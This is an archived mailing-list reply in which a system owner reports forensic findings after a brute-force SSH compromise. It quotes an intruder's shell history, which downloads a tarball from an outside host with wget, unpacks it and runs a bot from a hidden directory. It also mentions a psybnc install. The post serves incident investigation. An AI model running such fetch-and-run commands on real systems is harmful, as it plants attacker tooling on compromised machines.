[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Re: brute force ssh attack



>Were there any interesting files in the users' home directories? (Look for
>hidden files too, of course -- maybe a hidden directory named ... or
>something.) Also check in /tmp and /var. And any luck with the
>.bash_history? (For both the users and for root....)

This is ~daikanyama/.bash_history
passwd
ls
w
wget www.ring.as.ro/x/qwe.tgz
tar zxvf qwe.tgz
rm -rf qwe.tgz
cd .undernet
./mech
./mech
./mech
./mech

There is a complex directory tree under  ~daikanyama/.undernet

There are no interesting files under ~kevin.  
Kevin had tcsh as login shell.  Using ps aux, I have seen that kevin 
used ftp, and kevin also used passwd. 

One of the users compiled something, I have seen that they utilized 
"make". Kevin installed some program  psybnc  under /var/tmp

There is nothing interesting in /tmp and /root (root has tcsh as 
login shell). 









-- 
+++ Sparen beginnt mit GMX DSL: http://www.gmx.net/de/go/dsl


[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]